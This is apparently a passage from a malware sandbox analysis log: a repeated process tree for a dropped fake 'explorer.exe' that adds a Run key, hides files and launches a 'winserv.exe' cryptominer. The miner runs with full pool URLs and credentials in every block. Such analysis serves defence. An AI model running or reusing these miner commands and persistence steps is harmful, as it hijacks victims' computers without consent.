- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3988 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3660
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:968 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:3140
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1564
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2960 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2132
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1588
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3864 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2204
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3200
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1916 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4624
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:64 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4488
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2604
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2432 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2644
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:440 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3424
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4528
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4144 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5044
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:840
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4596 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4304
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:512
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3440 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2688
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1236
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3960 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:100
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:760
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1432 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:628
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1800
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3932
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1544 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5112
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2664
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4992 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2988
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4952 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:620 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3732
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:408 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1328
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5096
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4448 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3844
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4508
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2416 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:468
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3564
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:768 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1884
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4556
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3344 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4164
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1572
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1484
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3536 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2036
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:376
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4992 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4812
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2768
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5048
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4408
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1180 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:440
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4676
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3852 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1384
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1556
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1288 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2788
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4820
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2828 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2960
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4680
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:636 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2672
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4508
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4452 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1432
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3428
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4048 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1392
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4928
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2692 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2928
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5112 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5008
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4904
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1108
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3680 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1092
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2244 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4088
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:408
-
